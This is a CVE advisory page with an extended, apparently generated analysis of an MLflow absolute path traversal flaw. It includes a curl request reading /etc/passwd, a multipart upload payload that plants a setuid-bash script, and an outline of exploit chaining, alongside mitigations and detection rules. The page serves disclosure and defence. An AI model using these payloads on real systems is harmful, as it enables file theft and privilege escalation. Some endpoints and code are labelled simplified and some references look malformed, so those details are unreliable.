CVE-2023-3765
CVE-2023-3765
10.0
CriticalPublished:
Last updated:
Source:security@huntr.dev
Modified
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.
Comprehensive Technical Analysis of CVE-2023-3765 (MLflow Absolute Path Traversal Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2023-3765 CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Vulnerability Type: Absolute Path Traversal (CWE-36) Affected Software: MLflow (prior to version 2.5.0)
Severity Justification
- Attack Vector (AV:N): Exploitable remotely over a network without authentication.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No privileges needed; unauthenticated exploitation possible.
- User Interaction (UI:N): No user interaction required.
- Scope (S:C): Changes scope (impacts other components beyond the vulnerable system).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact on all three security pillars.
This vulnerability is critical due to its unauthenticated remote exploitation potential, allowing attackers to read, modify, or delete arbitrary files on the host system, leading to full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Root Cause Analysis
The vulnerability stems from improper path sanitization in MLflow’s file-handling mechanisms, particularly in components responsible for artifact storage and retrieval. An attacker can manipulate file paths to traverse outside the intended directory structure, accessing sensitive system files.
Exploitation Methods
-
Arbitrary File Read
- An attacker crafts a malicious HTTP request containing directory traversal sequences (e.g.,
../../../../etc/passwd). - MLflow fails to sanitize the input, allowing the attacker to read sensitive files (e.g.,
/etc/shadow, configuration files, SSH keys).
- An attacker crafts a malicious HTTP request containing directory traversal sequences (e.g.,
-
Arbitrary File Write (Potential RCE)
- If MLflow allows file uploads (e.g., model artifacts), an attacker could write malicious files (e.g., web shells, cron jobs) to executable directories.
- Example payload:
POST /api/2.0/mlflow/artifacts/upload HTTP/1.1 Host: vulnerable-mlflow-server Content-Type: multipart/form-data; boundary=---- ------ Content-Disposition: form-data; name="file"; filename="../../../../tmp/exploit.sh" #!/bin/bash chmod +s /bin/bash ------ - If the server processes the file, this could lead to remote code execution (RCE).
-
Denial-of-Service (DoS)
- An attacker could delete critical system files (e.g.,
/etc/passwd,/var/log/*), causing system instability.
- An attacker could delete critical system files (e.g.,
Proof-of-Concept (PoC) Exploit
A simplified PoC for file read:
curl -X GET "http://<MLFLOW_SERVER>/api/2.0/mlflow/artifacts/get?path=../../../../etc/passwd" -H "Authorization: Bearer <VALID_OR_INVALID_TOKEN>"
- If the server is vulnerable, it returns the contents of
/etc/passwd.
3. Affected Systems and Software Versions
- Affected Software: MLflow (open-source platform for machine learning lifecycle management)
- Vulnerable Versions: All versions prior to 2.5.0
- Fixed Version: 2.5.0 (released July 19, 2023)
- Deployment Scenarios:
- Self-hosted MLflow instances (on-premises/cloud)
- MLflow tracking servers in enterprise ML pipelines
- CI/CD pipelines integrating MLflow for model deployment
Detection Methods
- Network Scanning:
- Identify MLflow instances via HTTP headers (
Server: MLflow/2.x.x). - Check for exposed
/api/2.0/mlflow/artifactsendpoints.
- Identify MLflow instances via HTTP headers (
- Vulnerability Scanning:
- Use Nessus, OpenVAS, or Nuclei with CVE-2023-3765 detection templates.
- Manual Verification:
- Attempt path traversal via
curlor Burp Suite.
- Attempt path traversal via
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade to MLflow 2.5.0 or Later
- Apply the official patch from GitHub commit 6dde937.
- Verify the fix by testing path traversal attempts.
-
Network-Level Protections
- Restrict Access: Use firewalls to limit MLflow server exposure to trusted IPs.
- WAF Rules: Deploy a Web Application Firewall (WAF) (e.g., ModSecurity, Cloudflare) to block path traversal payloads (
../,..\,%2e%2e%2f).
-
Runtime Protections
- Containerization: Run MLflow in a least-privilege container (e.g., Docker with
read-onlyfilesystem). - Chroot Jail: Isolate MLflow in a restricted filesystem environment.
- Containerization: Run MLflow in a least-privilege container (e.g., Docker with
-
Authentication & Authorization
- Enable Authentication: Configure MLflow with basic auth, OAuth, or API keys.
- Role-Based Access Control (RBAC): Restrict artifact access to authorized users.
-
Monitoring & Logging
- Enable Audit Logs: Track file access attempts in MLflow logs.
- SIEM Integration: Forward logs to Splunk, ELK, or Datadog for anomaly detection.
Long-Term Recommendations
- Regular Vulnerability Scanning: Use Trivy, Snyk, or Dependabot to detect outdated dependencies.
- Secure Coding Practices: Implement input validation and path normalization in custom MLflow integrations.
- Zero Trust Architecture: Assume breach; enforce micro-segmentation and least privilege.
5. Impact on the Cybersecurity Landscape
Enterprise & Cloud Implications
- MLOps Supply Chain Risk:
- MLflow is widely used in MLOps pipelines (e.g., Databricks, AWS SageMaker, Azure ML).
- A compromise could lead to model poisoning, data exfiltration, or lateral movement in cloud environments.
- Data Breach Potential:
- Attackers could steal training datasets, model weights, or API keys stored in MLflow artifacts.
- Regulatory Compliance Risks:
- GDPR, HIPAA, CCPA: Unauthorized file access may violate data protection laws, leading to fines and legal action.
Threat Actor Motivations
- Cybercriminals: Exfiltrate sensitive data for extortion (ransomware) or sale on dark web.
- Nation-State Actors: Target MLflow in espionage campaigns to steal proprietary AI models.
- Insider Threats: Malicious insiders could escalate privileges via path traversal.
Broader Industry Trends
- Increased Targeting of MLOps Tools:
- Similar vulnerabilities have been found in Kubeflow, TensorFlow Serving, and Jupyter Notebooks.
- Shift Left in ML Security:
- Organizations are adopting SAST/DAST for ML code and runtime protection for models.
- Bug Bounty Programs:
- The disclosure via Huntr.dev highlights the growing role of crowdsourced security research in identifying critical vulnerabilities.
6. Technical Details for Security Professionals
Vulnerable Code Analysis
The vulnerability resides in MLflow’s artifact handling logic, where user-supplied paths are not properly sanitized. Example of flawed code (simplified):
def get_artifact_path(user_path):
base_dir = "/mlflow/artifacts"
full_path = os.path.join(base_dir, user_path) # Unsafe path joining
return full_path
- Issue:
os.path.join()does not prevent traversal ifuser_pathcontains../. - Fix: Use
os.path.abspath()+os.path.commonpath()to enforce directory boundaries.
Exploit Chaining Potential
- Initial Access:
- Exploit CVE-2023-3765 to read
/etc/passwdand identify users.
- Exploit CVE-2023-3765 to read
- Privilege Escalation:
- If MLflow runs as
root, write a cron job or SSH key to/root/.ssh/authorized_keys.
- If MLflow runs as
- Lateral Movement:
- Use stolen credentials to pivot to other systems in the network.
- Persistence:
- Deploy a reverse shell or backdoor via MLflow artifact uploads.
Forensic Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
GET /api/2.0/mlflow/artifacts/get?path=../../ | Path traversal attempt in logs. |
POST /api/2.0/mlflow/artifacts/upload | Suspicious file uploads with traversal payloads. |
/tmp/.malicious.sh | Unexpected scripts in temporary directories. |
chmod +s /bin/bash | Evidence of privilege escalation. |
Detection & Hunting Queries
- Splunk:
index=mlflow sourcetype=mlflow:api | search uri_path="*/artifacts/get*" OR uri_path="*/artifacts/upload*" | regex uri_path="\.\./|\.\.\\\\" | stats count by src_ip, uri_path - Sigma Rule (YAML):
title: MLflow Path Traversal Attempt id: 12345678-1234-5678-1234-567812345678 status: experimental description: Detects path traversal attempts in MLflow API references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3765 author: Your Name date: 2023/07/19 logsource: category: webserver product: mlflow detection: selection: cs-uri-query|contains: - "../" - "..\\" - "%2e%2e%2f" condition: selection falsepositives: - Legitimate artifact paths with dots level: high
Conclusion
CVE-2023-3765 represents a critical risk to organizations using MLflow, with unauthenticated remote exploitation leading to full system compromise. Immediate patching, network segmentation, and runtime protections are essential to mitigate this threat. Security teams should monitor for exploitation attempts, hunt for IOCs, and integrate MLflow into their vulnerability management programs.
For further details, refer to:
References
security@huntr.dev
https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76af854a3a-2127-422b-91ae-364da2661108
https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9baf854a3a-2127-422b-91ae-364da2661108
https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76